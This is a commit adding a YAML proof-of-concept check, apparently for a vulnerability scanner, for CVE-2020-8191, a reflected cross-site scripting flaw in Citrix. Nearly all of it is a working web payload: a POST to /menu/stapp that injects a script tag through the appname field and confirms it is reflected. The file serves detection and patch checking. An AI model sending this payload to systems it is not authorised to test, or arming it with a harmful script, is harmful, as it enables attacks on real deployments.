Create citrix-cve-2020-8191-xss.yml (#797)

Author: shmilylty

pocs/citrix-cve-2020-8191-xss.yml

@@ -0,0 +1,18 @@
+name: poc-yaml-citrix-cve-2020-8191-xss
+set:
+  r1: randomLowercase(6)
+rules:
+  - method: POST
+    path: /menu/stapp
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
+    follow_redirects: true
+    expression: response.body.bcontains(bytes("<script>alert(" + r1 + ");</script>"))
+detail:
+  author: JingLing(https://hackfun.org/)
+  links:
+    - https://support.citrix.com/article/CTX276688
+    - https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
+    - https://dmaasland.github.io/posts/citrix.html